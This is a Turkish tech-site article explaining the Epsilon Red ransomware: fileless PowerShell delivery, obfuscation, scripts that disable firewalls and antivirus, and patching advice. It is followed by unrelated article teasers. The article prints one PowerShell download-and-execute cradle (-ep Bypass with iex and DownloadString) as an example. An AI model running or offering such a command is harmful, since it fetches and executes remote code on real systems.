Epsilon Red fidye yazılımı nedir?

Sunucularınıza henüz yama yapmadınız mı ?

Epsilon Red adı verilen yeni bir fidye yazılımı tehdidi , kurumsal veri merkezlerindeki yama yapılmamış Microsoft tabanlı sunucuları hedef alıyor. Adını Marvel çizgi romanlarından az bilinen bir kötü adamdan alan Epsilon Red, yakın zamanda Sophos adlı bir siber güvenlik şirketi tarafından keşfedildi. Fidye yazılımı keşfinden bu yana dünya çapında birçok kuruluşa saldırdı.

Dosyasız fidye yazılımı PowerShell'de "gizleniyor"

Dosyasız fidye yazılımı, yasal yazılımları bir araya getirerek çalışan bir kötü amaçlı yazılım türüdür. PowerShell tabanlı dosyasız kötü amaçlı yazılım, PowerShell'in doğrudan cihazın belleğine yükleme yeteneğini kullanır. Bu özellik, PowerShell betiklerindeki kötü amaçlı yazılımların tespit edilmekten korunmasına yardımcı olur.

Tipik bir senaryoda, bir komut dosyası yürütüldüğünde öncelikle aygıtın sürücüsüne yazılması gerekir. Bu, uç nokta güvenlik çözümlerinin komut dosyalarını algılamasına olanak tanır. PowerShell standart betik yürütme süreçlerinin dışında tutulduğu için uç nokta güvenliğini atlayabilir. Ek olarak, bir PowerShell betiğinde bypass parametresinin kullanılması, saldırganın ağ betiği kısıtlamalarını aşmasına olanak tanır.

PowerShell bypass parametresinin bir örneği:

powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))

Gördüğünüz gibi PowerShell bypass parametrelerini tasarlamak nispeten kolaydır.

Buna yanıt olarak Microsoft, PowerShell ile ilgili uzaktan kötü amaçlı yazılım yürütme güvenlik açığını gidermek için bir yama yayımladı. Ancak yamalar yalnızca kullanıldıkları kadar etkilidir. Pek çok kuruluşun yama standartlarını gevşetmesi, ortamlarını saldırılara karşı savunmasız hale getiriyor. Epsilon Red'in tasarımı bu düzeydeki güvenlik açığından yararlanmaktır.

Epsilon Red'in ikili kullanışlılığı

Epsilon Red, yama uygulanmamış Microsoft sunucularına karşı en etkili yöntem olduğundan, kötü amaçlı yazılım bir fidye yazılımı ve tanımlama aracı olarak kullanılabilir. Epsilon'un bir ortamda başarılı olup olmaması, saldırganlara, hedeflerinin güvenlik yetenekleri hakkında daha fazla bilgi sağlar.

Epsilon'un Microsoft Exchange Server'a erişmede başarılı olması, kuruluşun genel yama güvenliği en iyi uygulamalarını takip etmediği anlamına gelir. Saldırganın gözünde bu, hedefin ortamının geri kalanının Epsilon tarafından ne kadar kolay tehlikeye atılabileceğini gösterir.

Epsilon Red, yükünü gizlemek için Gizleme'yi kullanıyor. Gizleme, kodu okunamaz hale getirir ve PowerShell kötü amaçlı yazılımlarında PowerShell komut dosyalarının yüksek düzeyde okunabilirliğini önlemek için kullanılır. Gizleme ile birlikte, PowerShell takma adı cmdlet'leri antivirüs yazılımının PowerShell günlüklerindeki kötü amaçlı komut dosyalarını tanımlamasını zorlaştırmak için kullanılır.

Epsilon Red fidye yazılımı nedir?

Epsilon Red, yama yapılmamış Microsoft sunucularına karşı en etkilidir

Ancak gizlenmiş PowerShell betikleri yine de tanımlanabilir. Yaklaşan bir PowerShell Betiği saldırısının ortak işareti, bir WebClient nesnesinin oluşturulmasıdır. Saldırgan, kötü amaçlı kod içeren uzak bir URL'ye harici bağlantı kurmak için PowerShell kodunda bir WebClient nesnesi oluşturacaktır .

Bir kuruluş saldırıya uğrarsa, gizlenmiş PowerShell komut dosyalarını tespit etmek için yeterli güvenlik önlemlerine sahip olma olasılığı çok düşüktür. Tersine, eğer Epsilon Red sunucuya giremezse, bu durum saldırgana hedefin ağının PowerShell kötü amaçlı yazılımının şifresini hızlı bir şekilde çözebileceğini ve saldırıyı daha az değerli hale getireceğini gösterecektir.

Epsilon Red siber saldırısı

Epsilon Red'in işlevselliği oldukça basittir. Yazılım, sunuculara sızmak için bir dizi Powershell komut dosyası kullanır. Bu PowerShell betikleri 1.ps1'den 12.ps1'e kadar numaralandırılmıştır . Her PowerShell betiğinin tasarımı, son yük için bir hedef sunucu hazırlamaktır.

Epsilon Red'deki tüm PowerShell komut dosyalarının kendi amaçları vardır. Epsilon Red'deki PowerShell komut dosyalarından biri, hedefin ağ güvenlik duvarı kurallarını çözmek için tasarlanmıştır. Bu serideki başka bir yazılım, hedefin antivirüs yazılımını kaldırmak için tasarlanmıştır.

Tahmin edebileceğiniz gibi, bu komut dosyaları, yük teslim edildikten sonra hedefin ilerlemesini hızlı bir şekilde durduramamasını sağlamak için senkronize çalışır.

Yükü ilet

Epsilon'un PowerShell komut dosyaları son yüküne yer açtığında Red.exe uzantısı olarak dağıtılır . Sunucuya girdiğinde Red.exe, sunucunun dosyalarını tarayacak ve algıladığı her dosya için bir dizin yolu listesi oluşturacaktır. Liste oluşturulduktan sonra, listedeki her dizin yolu için ana kötü amaçlı yazılım dosyasından alt işlemler oluşturulur. Daha sonra her fidye yazılımı alt dosyası, liste dosyasındaki bir dizin yolunu şifreler.

Epson'un listesindeki tüm klasör yolları şifrelendikten sonra hedefi bilgilendirmek ve saldırganın isteğini belirtmek için bir .txt dosyası bırakılacaktır. Ayrıca, güvenliği ihlal edilmiş sunucuya bağlı tüm erişilebilir ağ düğümlerinin güvenliği ihlal edilecek ve kötü amaçlı yazılımların ağa girme olasılığı artabilecektir.

Epsilon Red'in arkasında kim var?

Epsilon Red fidye yazılımı nedir?

Epsilon Red'in arkasındaki saldırganların kimlikleri hala bilinmiyor

Epsilon Red'in arkasındaki saldırganların kimlikleri hala bilinmiyor. Ancak bazı ipuçları saldırganların kökenine işaret ediyor. İlk ipucu, kötü amaçlı yazılımın adıdır. Epsilon Red, Rus kökenli bir hikayeye sahip bir X-Men kötü adamıdır.

İkinci ipucu ise kodun geride bıraktığı .txt dosyasının fidye notunda yatıyor. REvil adlı fidye yazılımı çetesinin bıraktığı nota benziyor. Ancak bu benzerlik, saldırganların bu çetenin üyesi olduğu anlamına gelmiyor. REvil, bağlı kuruluşların kötü amaçlı yazılımlarına erişim için REvil'e ödeme yaptığı bir RaaS (hizmet olarak fidye yazılımı) operasyonu yürütmektedir.

Kendinizi Epsilon Red'den koruyun

Şu ana kadar Epsilon Red, yama yapılmamış sunuculara başarıyla sızdı. Bu, Epsilon Red ve benzeri fidye yazılımı kötü amaçlı yazılımlarına karşı en iyi korumalardan birinin ortamınızın doğru şekilde yönetilmesini sağlamak olduğu anlamına gelir. Ayrıca PowerShell betiklerinin şifresini hızlı bir şekilde çözebilen bir güvenlik çözümüne sahip olmak, ortamınıza faydalı bir katkı olacaktır.

Yorum bırak

Windows 10da ekranın sağ köşesindeki telif hakkı isteği bildirimi nasıl kaldırılır

Windows 10da ekranın sağ köşesindeki telif hakkı isteği bildirimi nasıl kaldırılır

Ekranın sağ köşesinde bir Windows 10 etkinleştirme bildirimi görüyor musunuz? Bu makale, Windows 10'da telif hakkı isteği bildirimini nasıl sileceğiniz konusunda size rehberlik edecektir.

Windows 10 build 14393.222nin nasıl kurulacağına ilişkin Adan Zye talimatlar

Windows 10 build 14393.222nin nasıl kurulacağına ilişkin Adan Zye talimatlar

Microsoft yakın zamanda Windows 10 PC kullanıcıları için Derleme 14393.222 adlı en son toplu güncelleştirmeyi yayımladı. Windows 10 için yayımlanan bu güncelleme, esas olarak kullanıcı geri bildirimlerine dayalı olarak hataları düzeltiyor ve işletim sisteminin performans deneyimini geliştiriyor.

Bilgisayar ağınızı Bastion ana bilgisayarıyla yalnızca 3 adımda koruyun

Bilgisayar ağınızı Bastion ana bilgisayarıyla yalnızca 3 adımda koruyun

Yerel ağınızda harici erişime ihtiyaç duyan bilgisayarlarınız var mı? Ağınız için bir kale ana bilgisayarını ağ geçidi denetleyicisi olarak kullanmak iyi bir çözüm olabilir.

Windows 10daki tüm olay günlüklerini hızla temizlemenin 3 yolu

Windows 10daki tüm olay günlüklerini hızla temizlemenin 3 yolu

Bazen eski olay günlüklerinin tamamını bir kerede silmeniz gerekebilir. Bu kılavuzda Quantrimang.com, Windows 10 Olay Görüntüleyicisi'ndeki tüm olay günlüklerini hızlı bir şekilde silmenin 3 yolunu gösterecektir.

Klavyeniz kullanılamıyorsa Windows tuşu nasıl oluşturulur

Klavyeniz kullanılamıyorsa Windows tuşu nasıl oluşturulur

IBM Model M gibi fiziksel bir Windows tuşu içermeyen eski bir klasik klavye kullanmayı tercih ederseniz, sık kullanmadığınız bir anahtarı ödünç alarak daha fazlasını eklemenin kolay bir yöntemi vardır.

Windows 10da şeffaf arka plan modu nasıl oluşturulur

Windows 10da şeffaf arka plan modu nasıl oluşturulur

WindowTop, Windows 10 bilgisayarlarda çalışan tüm uygulama pencerelerini ve programlarını karartma özelliğine sahip bir araçtır.Ya da pencerelerde koyu arka planlı bir arayüz kullanabilirsiniz.

Sahte IP yöntemleri anonim olarak erişmenize yardımcı olur

Sahte IP yöntemleri anonim olarak erişmenize yardımcı olur

Daha önceki birçok makalemizde çevrimiçi ortamda anonim kalmanın son derece önemli olduğundan bahsetmiştik. Özel bilgilerin her yıl sızdırılması, çevrimiçi güvenliği giderek daha gerekli hale getiriyor. Sanal IP adreslerini kullanmamızın nedeni de budur. Aşağıda sahte IP'ler oluşturma yöntemlerini öğreneceğiz!

Windows 8 görev çubuğunda dil çubuğunu nasıl kapatılır

Windows 8 görev çubuğunda dil çubuğunu nasıl kapatılır

Windows 8'deki dil çubuğu, masaüstü ekranında otomatik olarak görüntülemek için tasarlanmış minyatür bir dil araç çubuğudur. Ancak, birçok kişi bu dil çubuğunu görev çubuğuna gizlemek istiyor.

Linksysten İnternet bağlantı hızını optimize etmeye yönelik ipuçları

Linksysten İnternet bağlantı hızını optimize etmeye yönelik ipuçları

İnternet hızını en üst düzeye çıkarmak, ağ bağlantınızı optimize etmek için çok önemlidir. Bilgisayarları, internete hazır TV'leri, oyun konsollarını vb. kullanarak en iyi eğlence ve iş deneyimini yaşayabilirsiniz.

Linksys yönlendirici için WEP, WPA, WPA2 nasıl kurulur

Linksys yönlendirici için WEP, WPA, WPA2 nasıl kurulur

Kablosuz bağlantı günümüzde bir zorunluluktur ve bu nedenle dahili ağınızın güvenliğini sağlamak için kablosuz güvenlik şarttır.